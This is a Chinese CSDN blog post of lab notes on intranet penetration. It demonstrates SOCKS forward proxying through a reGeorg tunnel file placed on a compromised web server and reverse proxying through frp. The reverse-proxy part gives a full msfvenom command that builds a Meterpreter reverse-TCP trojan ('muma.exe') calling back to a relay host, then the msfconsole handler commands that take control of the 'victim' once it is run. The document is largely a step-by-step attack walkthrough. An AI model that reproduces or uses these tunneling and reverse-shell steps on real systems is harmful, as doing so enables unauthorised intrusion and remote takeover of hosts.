正向代理、反向代理 实战演示

最新推荐文章于 2024-05-09 17:17:34 发布
最新推荐文章于 2024-05-09 17:17:34 发布
阅读量1.2k 收藏 23
点赞数 27
分类专栏: 内网 文章标签: web安全 笔记 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134980358
版权

正向代理

代理服务:socks5 应用层协议

环境搭建

攻击机可以访问 socks 代理服务器的 web

socks 代理服务器可以和 kali 通信,也可以和内网主机通信

攻击机无法直接和内网主机通信

  • 攻击机(Win11)

    10.9.47.221

  • socks 代理服务器

    网卡1:10.9.47.172

    网卡2:192.168.1.1

  • 内网主机

    192.168.1.2

image-20231213181600126

代理程序下载

链接:https://pan.baidu.com/s/1kFXhdznQKbmYYduCRvfLQQ?pwd=xyt9
提取码:xyt9

架设过程

失陷主机 Web 根目录(Web 可以访问到的文件)下放

image-20231213181722212

使用攻击机(Win11)访问 socks 服务器的 tunnel.nosocket.php 文件,出现以下结果则说明成功

image-20231213181843398

使用攻击机开启客户端

python2 reGeorgSocksProxy.py -p 8080 -u http://10.9.47.172/tunnel.nosocket.php

image-20231213182634102

image-20231213182113268

浏览器添加 socks 代理

image-20231213182347713

浏览器访问内网

攻击机(Win11)浏览器选择 socks 代理,此时浏览器可以访问内网服务器的 web

image-20231213182509111

而此时攻击机和内网主机不在同一网段

image-20231213182609280

访问内网的其他服务

下载正向代理客户端

image-20231213182740389

链接:https://pan.baidu.com/s/1BIDhFjEFk8DijHZxhUx8Bg?pwd=mr9y
提取码:mr9y

连接服务器

image-20231213183200255

设置哪些 exe 程序要使用代理

image-20231213183227681

连接内网主机的远程桌面程序

image-20231213183700348

输入凭据

image-20231213183725647

成功进入

反向代理

实际渗透时,frp server 在云上,frp client 在攻击主机

frp 客户端向服务器发送链接请求,连接成功后,服务器会把自己收到的流量发送给客户端

frp 客户端和服务器都有自己的配置文件,服务器哪个端口接受的流量,发送给客户端的哪个端口,都必须在配置文件写清楚

frp 下载

链接:https://pan.baidu.com/s/1vBW5z7gOyoPf1dNCRD7DuQ?pwd=ctpl
提取码:ctpl

image-20231213191042487

client 端配置文件

image-20231213191554883

环境搭建

  • kali(NAT 模式)

    192.168.1.128

  • 真实主机(跳板机、frp 服务端)

    10.9.47.90

  • 受害服务器

    10.9.47.172

目的让受害服务器连接 kali 的反弹木马,上线,使用 kali 进行控制

frp 搭建

跳板机(10.9.47.90)启动 frp 服务端程序

.\frps.exe -c frps.ini

image-20231213191526015

kali 下载 Linux 版 frp

链接:https://pan.baidu.com/s/1uLqhyMx06E45OUBNaoxdqA?pwd=s9jv
提取码:s9jv

攻击机 Kali 编辑 frpc.ini 文件

local_port 木马连接的端口

image-20231213193310701

开启 frpc

./frpc -c frpc.ini

image-20231213193417244

木马生成、上传

使用 kali 生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.47.90 LPORT=6789 -f exe > muma.exe

# 让目标服务器向 frp 代理(服务端)发送连接请求,然后代理将流量转发给 kali

image-20231213192639291

开启监听

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp 

set LHOST 127.0.0.1

set LPORT 6789

run

image-20231213193715562

受害者上线

将木马放到受害主机

image-20231213193540298

双击打开上线

image-20231213193759208

image-20231213193934218

gjl_
关注
  • 27
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
正向代理反向代理PPT
04-16
有关正向代理反向代理的简单科普PPT,对于小白来说便于理解和结束,关于PPT的排版和颜色等方面也希望各位大佬能提供宝贵的建议
frp实现二级代理
bring_coco的博客
08-30 540
然后我们扫描ad01上网卡发现仍然存在两个网卡,且172不出网,通过fscan扫描到了172网段的一些网站,因为10.10.10.139网站服务器且被我们拿下,那么我们想将它的流量代理到我们的攻击机kali上去攻击访问172网段上的web服务,那么需要做二级代理。通过拿下10.10.10.139主机之后,在web根目录下传入我们的正向代理工具Neo-reGeorg(因为172段不出网,所以传入正向代理工具)可以看到可以成功访问到路径下的代理文件且生成了新代理(二级代理),成功连接上了,然后我们配置代理。
内网渗透—隧道搭建&Ngrok与Frp内网穿透
剁椒鱼头没剁椒的博客
06-14 4512
在内网渗透过程中会遇到很多的内网主机不能访问外网主机,或者做了很多的限制。导致我们的后门木马无法上线,而这时候就需要根据具体的显示是使用DNS隧道还是ICMP隧道以及其它的隧道技术,或者是使用内网穿透,使其内网主机穿透防火墙的限制,访问外网。简单来说隧道技术就是解决通信上的问题,例如防火墙的限制,或者某个协议或端口被限制,这类隧道技术主要就是借用不同的协议以及不同的端口来绕过防火墙的限制,以实现内网主机与外网主机的连接。
frp(开源的内网穿透工具)使用介绍
kk的任意门
01-24 1万+
frp 是一个可用于内网穿透的高性能的反向代理应用。 这里涉及到两个名词:反向代理、内网穿透 反向代理 反向代理正向代理是相对的。 我们平时用的可以访问国外网站的代理是正向代理。因为防火墙的关系,我们不能直接访问国外的网站,但是我们可以通过租借国外的服务器,从而让这个服务器来帮助我们访问国外的网站,这个服务器就称为代理服务器。我们只需要向代理服务器发出请求,我们要访问的网站也只能收到来自代理服务器的通信请求,并不知道这个请求是由哪个客户端发起的。简单来说,就是正向代理服务器屏蔽了客户端。 而反向服务器是
FRP代理搭建
buffedon的博客
07-08 4511
FRPFRP搭建服务器端客户端登录VPS验证总结参考 FRP搭建 frp 是一种快速反向代理,是一个隧道工具,可帮助您将 NAT 或防火墙后面的本地服务器暴露给 Internet。 截至目前,它支持TCP和UDP,以及HTTP和HTTPS协议,其中请求可以通过域名转发到内部服务。 服务器端 1.下载命令 wget https://github.com/fatedier/frp/releases/download/v0.37.0/frp_0.37.0_linux_amd64.tar.gz 2.解压缩命令 t
【内网安全】 隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目
今天是几号的博客
03-23 1544
推荐 相当于自己管理整个平台很方便nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
流量代理-正向反向代理
2301_79441074的博客
01-08 1341
socks5提供代理服务,各种编程语言自带socks5服务,只需要编辑几行代码就可以搭建起socks5服务,直接上传编辑好的脚本就可以开启服务。
nginx正向代理反向代理详解
09-29
本文将详细介绍Nginx如何实现正向代理反向代理,以及这两种代理方式的应用场景。 **正向代理** 正向代理的主要作用是让内部网络中的设备(如服务器B)通过一个具有外部网络访问权限的设备(如服务器A)来访问...
Nginx正向反向代理区别及原理解析
09-29
主要介绍了Nginx正向反向代理区别及原理解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
正向代理,apache,反向代理,Nginx
07-07
配置正向代理服务器使用,Nginx只能做反向代理,Apache24可以作正向代理
什么是正向代理,什么是反向代理
12-14
什么是正向代理,什么是反向代理
利用Nginx+Frp搭建HTTP正向代理
weixin_30951231的博客
05-04 2111
1.工具:     一台具有公网IP的服务器;Frp; Nginx; SwitchySharp浏览器插件; 2.操作步骤  配置具有公网Ip的服务端:Frps配置:文件路径“frp\frps.ini” [common] bind_port = 7000 #服务器端口 dashboard_addr = 0.0.0.0 #仪表板监听地址 dashb...
frp内网穿透-ubuntu下搭建frp服务器-利用frp客户端实现内网穿透
热门推荐
oCaiHong123的博客
05-31 1万+
在实验室的服务器搭建了ubuntu虚拟机并且配置了LAMP环境与tomcat,开启了ssh,关闭了防火墙,打开了火狐浏览器输入学号密码连接了校园网。虚拟机IP地址:10.10.10.170问题:在实验室利用xshell,用ssh协议连接上了ubuntu,但是必须连接实验室路由器或者校园网,在外网环境下无法连接(宿舍宽带,手机4G网络)目的:利用frp,实现校园网以外的网络(外网)访问实验室服务器的...
内网穿透-Frp--上线
尘玥的故事
09-26 614
frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。两个内网直接相互通信
正向代理&反向代理&frpc&nginx
最新发布
weixin_50722482的博客
05-09 570
nginx,frpc,正向代理反向代理介绍
frp_内网渗透_穿透_最新的toml使用socks5方法
weixin_50995890的博客
11-14 736
当您访问一个网站时,您的请求会先发送到反向代理服务器,然后由代理服务器将请求转发给真实的目标服务器处理,并将目标服务器的响应返回给您。反向代理可以提供负载均衡和高可用性,它可以根据服务器的负载情况将请求分发给多个后端服务器,并在其中一个服务器出现故障时自动切换到另一个可用的服务器。当您通过正向代理访问互联网上的资源时,您的请求首先发送到代理服务器,然后由代理服务器转发到目标服务器,最后将响应返回给您。例如,如果您在中国,可以使用正向代理来绕过网络封锁,访问被屏蔽的网站。正向:我向你请求连接(向被控电脑)
内网渗透-代理/端口转发
qq_42267685的博客
07-16 1579
端口转发想学很久了,看了很多大佬的文章,但是看了就忘了-。- 所以选择记下来然后都实际操作一波。虽然以后还是会往,唉。 代理 代理分为正向代理反向代理 正向代理 正向代理我理解就是你的请求通过代理给服务器,服务器只能看到代理的请求,不会发现你的存在。 比如很多 的ssr代理等,通过服务器访问目标,目标是不会察觉到 你的存在的。 通俗点的理解是: A想向C借钱,但是C不认识A所以不借给他,然后A就通过B向C借钱,B借到钱之后再转交给A,真正借钱的人是谁,C是不知道的,在这个过程中B就是扮演了一个代理的
内网渗透--frp代理设置与proxychains代理设置
隔壁山上小道士的博客
05-15 1万+
frp代理设置内网跳板机
正向代理反向代理
prupcognition的博客
03-05 117
对于正向代理反向代理的概念看了一些文章,当时好像懂了,过了一段时间又忘了,还是没有理解到根本上 突然今天感觉明白了,记下来,省得再忘了 正向代理: 代表的是客户端,也就是请求的一方, 服务器端看到的请求IP是代理的IP,也就是说真正的客户端对服务器是透明的 反向代理:代表的是服务器,也就是服务的一方 ,客户端看到的响应IP是代理的IP,也就是说真正的服务器对客户端是透明的...
Nginx性能优化实战反向代理、缓存与参数调优
课程中还强调了正向代理反向代理的区别,前者客户端需要知道代理服务器地址,而后者客户端无需知悉,更侧重于服务内部的逻辑处理和流量分配。通过实例演示,学员能够学习如何在Nginx中配置这两种代理模式,以及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值